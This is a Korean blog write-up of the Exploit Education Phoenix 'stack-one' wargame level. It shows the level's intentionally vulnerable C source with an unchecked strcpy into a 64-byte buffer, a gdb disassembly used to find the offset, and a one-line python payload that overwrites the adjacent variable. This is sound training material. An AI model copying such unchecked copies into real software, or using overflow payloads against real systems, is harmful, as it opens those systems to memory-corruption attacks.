![[Phoenix] Stack One](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FJUdUo%2FbtrM7oMVKzF%2FfERvRMryNyRfrkZazE7fVk%2Fimg.png)
728x90
반응형
1. intro
2. code 및 분석
2.1. C code
/*
* phoenix/stack-one, by https://exploit.education
*
* The aim is to change the contents of the changeme variable to 0x496c5962
*
* Did you hear about the kid napping at the local school?
* It's okay, they woke up.
*
*/
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BANNER \
"Welcome to " LEVELNAME ", brought to you by https://exploit.education"
int main(int argc, char **argv) {
struct {
char buffer[64];
volatile int changeme;
} locals;
printf("%s\n", BANNER);
if (argc < 2) {
errx(1, "specify an argument, to be copied into the \"buffer\"");
}
locals.changeme = 0;
strcpy(locals.buffer, argv[1]);
if (locals.changeme == 0x496c5962) {
puts("Well done, you have successfully set changeme to the correct value");
} else {
printf("Getting closer! changeme is currently 0x%08x, we want 0x496c5962\n",
locals.changeme);
}
exit(0);
}
2.2. 분석
이번에는 인자로 값을 받아 locals.buffer 변수에 복사하며, locals.changeme 변수가 0x496c5962면 성공이다.
3. 취약점 확인 및 공격 준비
3.1. 취약점
동일하게 strcpy 시 그 크기를 확인하지 않아 다른 주소에 overwrite 가능하다.
3.2. 공격 준비
마찬가지로 gdb로 위치만 확인하면 되겠다.
...
0x00000000004006a0 <+51>: movl $0x0,-0x10(%rbp)
0x00000000004006a7 <+58>: mov -0x60(%rbp),%rax
0x00000000004006ab <+62>: add $0x8,%rax
0x00000000004006af <+66>: mov (%rax),%rdx #rbp-0x60+8의 값을 rdx에 삽입
0x00000000004006b2 <+69>: lea -0x50(%rbp),%rax #rbp-0x50의 값을 rsi에 삽입
0x00000000004006b6 <+73>: mov %rdx,%rsi
0x00000000004006b9 <+76>: mov %rax,%rdi
0x00000000004006bc <+79>: callq 0x4004a0 <strcpy@plt>
0x00000000004006c1 <+84>: mov -0x10(%rbp),%eax
0x00000000004006c4 <+87>: cmp $0x496c5962,%eax #rbp-0x10 값을 비교.
...src -> dest로 복사하니 0x40 이후의 값이 해당 값이면 된다.
4. exploit
user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-one `python -c 'print "A"*0x40 + "\x62\x59\x6c\x49"'`
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value728x90
반응형
'Wargame > Exploit Education' 카테고리의 다른 글
| [Phoenix] Stack four (0) | 2022.09.27 |
|---|---|
| [Phoenix] Stack three (0) | 2022.09.27 |
| [phoenix] Stack Two (0) | 2022.09.26 |
| [Phoenix] Stack Zero (0) | 2022.09.26 |
| Phoenix 환경 설정 및 참고사항. (0) | 2022.09.26 |